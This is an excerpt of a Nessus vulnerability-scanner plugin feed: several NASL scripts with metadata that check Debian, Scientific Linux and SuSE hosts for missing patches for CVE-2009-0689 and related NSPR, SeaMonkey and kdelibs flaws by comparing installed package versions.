"bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-0689", "CVE-2009-2463"], "modified": "2010-02-24T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:5.0", "p-cpe:/a:debian:debian_linux:nspr"], "id": "DEBIAN_DSA-1931.NASL", "href": "https://www.tenable.com/plugins/nessus/44796", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1931. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44796);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-0689\", \"CVE-2009-2463\");\n script_bugtraq_id(35769, 36851);\n script_xref(name:\"DSA\", value:\"1931\");\n\n script_name(english:\"Debian DSA-1931-1 : nspr - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the NetScape Portable\nRuntime Library, which may lead to the execution of arbitrary code.\nThe Common Vulnerabilities and Exposures project identifies the\nfollowing problems :\n\n - CVE-2009-1563\n A programming error in the string handling code may lead\n to the execution of arbitrary code.\n\n - CVE-2009-2463\n An integer overflow in the Base64 decoding functions may\n lead to the execution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1563\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-2463\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1931\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the NSPR packages.\n\nThe old stable distribution (etch) doesn't contain nspr.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 4.7.1-5.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:nspr\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"libnspr4-0d\", reference:\"4.7.1-5\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libnspr4-0d-dbg\", reference:\"4.7.1-5\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libnspr4-dev\", reference:\"4.7.1-5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:44:33", "description": "A flaw was found in the way SeaMonkey creates temporary file names for\ndownloaded files. If a local attacker knows the name of a file\nSeaMonkey is going to download, they can replace the contents of that\nfile with arbitrary contents. (CVE-2009-3274)\n\nA heap-based buffer overflow flaw was found in the SeaMonkey string to\nfloating point conversion routines. A web page containing malicious\nJavaScript could crash SeaMonkey or, potentially, execute arbitrary\ncode with the privileges of the user running SeaMonkey.\n(CVE-2009-1563)\n\nA flaw was found in the way SeaMonkey handles text selection. A\nmalicious website may be able to read highlighted text in a different\ndomain (e.g. another website the user is viewing), bypassing the\nsame-origin policy. (CVE-2009-3375)\n\nA flaw was found in the way SeaMonkey displays a right-to-left\noverride character when downloading a file. In these cases, the name\ndisplayed in the title bar differs from the name displayed in the\ndialog body. An attacker could use this flaw to trick a user into\ndownloading a file that has a file name or extension that differs from\nwhat the user expected. (CVE-2009-3376)\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause SeaMonkey to crash\nor, potentially, execute arbitrary code with the privileges of the\nuser running SeaMonkey. (CVE-2009-3380)\n\nAfter installing the update, SeaMonkey must be restarted for the\nchanges to take effect.", "edition": 25, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : seamonkey on SL3.x, SL4.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-3376", "CVE-2009-3274", "CVE-2009-3380", "CVE-2009-3375", "CVE-2009-0689"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20091027_SEAMONKEY_ON_SL3_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60685", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60685);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0689\", \"CVE-2009-3274\", \"CVE-2009-3375\", \"CVE-2009-3376\", \"CVE-2009-3380\");\n\n script_name(english:\"Scientific Linux Security Update : seamonkey on SL3.x, SL4.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the way SeaMonkey creates temporary file names for\ndownloaded files. If a local attacker knows the name of a file\nSeaMonkey is going to download, they can replace the contents of that\nfile with arbitrary contents. (CVE-2009-3274)\n\nA heap-based buffer overflow flaw was found in the SeaMonkey string to\nfloating point conversion routines. A web page containing malicious\nJavaScript could crash SeaMonkey or, potentially, execute arbitrary\ncode with the privileges of the user running SeaMonkey.\n(CVE-2009-1563)\n\nA flaw was found in the way SeaMonkey handles text selection. A\nmalicious website may be able to read highlighted text in a different\ndomain (e.g. another website the user is viewing), bypassing the\nsame-origin policy. (CVE-2009-3375)\n\nA flaw was found in the way SeaMonkey displays a right-to-left\noverride character when downloading a file. In these cases, the name\ndisplayed in the title bar differs from the name displayed in the\ndialog body. An attacker could use this flaw to trick a user into\ndownloading a file that has a file name or extension that differs from\nwhat the user expected. (CVE-2009-3376)\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause SeaMonkey to crash\nor, potentially, execute arbitrary code with the privileges of the\nuser running SeaMonkey. (CVE-2009-3380)\n\nAfter installing the update, SeaMonkey must be restarted for the\nchanges to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0910&L=scientific-linux-errata&T=0&P=2336\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?66db570c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(16, 119, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-1.0.9-0.47.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-chat-1.0.9-0.47.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-devel-1.0.9-0.47.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-dom-inspector-1.0.9-0.47.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-js-debugger-1.0.9-0.47.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-mail-1.0.9-0.47.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-nspr-1.0.9-0.47.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-nspr-devel-1.0.9-0.47.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-nss-1.0.9-0.47.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-nss-devel-1.0.9-0.47.el3\")) flag++;\n\nif (rpm_check(release:\"SL4\", reference:\"seamonkey-1.0.9-50.el4_8\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"seamonkey-chat-1.0.9-50.el4_8\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"seamonkey-devel-1.0.9-50.el4_8\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"seamonkey-dom-inspector-1.0.9-50.el4_8\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"seamonkey-js-debugger-1.0.9-50.el4_8\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"seamonkey-mail-1.0.9-50.el4_8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:12:12", "description": "KDE KDELibs Remote Array Overrun (Arbitrary code execution),\nCVE-2009-0689", "edition": 23, "published": "2009-12-08T00:00:00", "title": "SuSE 11 Security Update : kdelibs3 (SAT Patch Number 1639)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0689"], "modified": "2009-12-08T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:kdelibs3-default-style-32bit", "p-cpe:/a:novell:suse_linux:11:kdelibs3-default-style", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:kdelibs3", "p-cpe:/a:novell:suse_linux:11:kdelibs3-32bit"], "id": "SUSE_11_KDELIBS3-091202.NASL", "href": "https://www.tenable.com/plugins/nessus/43056", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43056);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0689\");\n\n script_name(english:\"SuSE 11 Security Update : kdelibs3 (SAT Patch Number 1639)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"KDE KDELibs Remote Array Overrun (Arbitrary code execution),\nCVE-2009-0689\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=557126\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0689.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 1639.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kdelibs3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kdelibs3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kdelibs3-default-style\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kdelibs3-default-style-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"kdelibs3-3.5.10-23.27.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"kdelibs3-default-style-3.5.10-23.27.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"kdelibs3-3.5.10-23.27.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"kdelibs3-default-style-3.5.10-23.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"kdelibs3-3.5.10-23.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"kdelibs3-default-style-3.5.10-23.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"kdelibs3-32bit-3.5.10-23.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"kdelibs3-default-style-32bit-3.5.10-23.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"kdelibs3-32bit-3.5.10-23.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"kdelibs3-default-style-32bit-3.5.10-23.27.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:05:52", "description": "KDE KDELibs Remote Array Overrun (Arbitrary code execution),\nCVE-2009-0689", "edition": 21, "published": "2009-12-08T00:00:00", "title": "openSUSE Security Update : kdelibs3 (kdelibs3-1648)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0689"], "modified": "2009-12-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kdelibs3-32bit", "p-cpe:/a:novell:opensuse:libkde4-devel", "p-cpe:/a:novell:opensuse:kdelibs3", "p-cpe:/a:novell:opensuse:libkdecore4-devel", "p-cpe:/a:novell:opensuse:libkde4-32bit", "cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:utempter", "p-cpe:/a:novell:opensuse:libkdecore4-32bit", "p-cpe:/a:novell:opensuse:kdelibs3-default-style", "p-cpe:/a:novell:opensuse:kdelibs3-devel", "p-cpe:/a:novell:opensuse:kdelibs4-core", "p-cpe:/a:novell:opensuse:kdelibs3-arts", "p-cpe:/a:novell:opensuse:kdelibs3-arts-32bit", "p-cpe:/a:novell:opensuse:kdelibs4-branding-upstream", "p-cpe:/a:novell:opensuse:libkde4", "p-cpe:/a:novell:opensuse:libkdecore4", "p-cpe:/a:novell:opensuse:kdelibs3-default-style-32bit", "p-cpe:/a:novell:opensuse:utempter-32bit", "p-cpe:/a:novell:opensuse:kdelibs4"], "id": "SUSE_11_2_KDELIBS3-091204.NASL", "href": "https://www.tenable.com/plugins/nessus/43055", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update kdelibs3-1648.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43055);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_name(english:\"openSUSE Security Update : kdelibs3 (kdelibs3-1648)\");\n script_summary(english:\"Check for the kdelibs3-1648 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"KDE KDELibs Remote Array Overrun (Arbitrary code execution),\nCVE-2009-0689\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=557126\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kdelibs3 packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs3-arts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs3-arts-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs3-default-style\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs3-default-style-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs4-branding-upstream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs4-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libkde4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libkde4-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libkde4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libkdecore4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libkdecore4-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libkdecore4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:utempter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:utempter-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kdelibs3-3.5.10-32.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kdelibs3-arts-3.5.10-32.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kdelibs3-default-style-3.5.10-32.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kdelibs3-devel-3.5.10-32.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kdelibs4-4.3.1-6.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kdelibs4-branding-upstream-4.3.1-6.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kdelibs4-core-4.3.1-6.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libkde4-4.3.1-6.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libkde4-devel-4.3.1-6.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libkdecore4-4.3.1-6.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libkdecore4-devel-4.3.1-6.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"utempter-0.5.5-142.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"kdelibs3-32bit-3.5.10-32.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"kdelibs3-arts-32bit-3.5.10-32.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"kdelibs3-default-style-32bit-3.5.10-32.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"libkde4-32bit-4.3.1-6.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"libkdecore4-32bit-4.3.1-6.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"utempter-32bit-0.5.5-142.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kdelibs3 / kdelibs4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:45:23", "description": "KDE KDELibs Remote Array Overrun (Arbitrary code execution),\nCVE-2009-0689", "edition": 23, "published": "2010-10-11T00:00:00", "title": "SuSE 10 Security Update : kdelibs3 (ZYPP Patch Number 6692)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0689"], "modified": "2010-10-11T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_KDELIBS3-6692.NASL", "href": "https://www.tenable.com/plugins/nessus/49866", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49866);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0689\");\n\n script_name(english:\"SuSE 10 Security Update : kdelibs3 (ZYPP Patch Number 6692)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"KDE KDELibs Remote Array Overrun (Arbitrary code execution),\nCVE-2009-0689\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0689.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6692.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"kdelibs3-3.5.1-49.53.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, 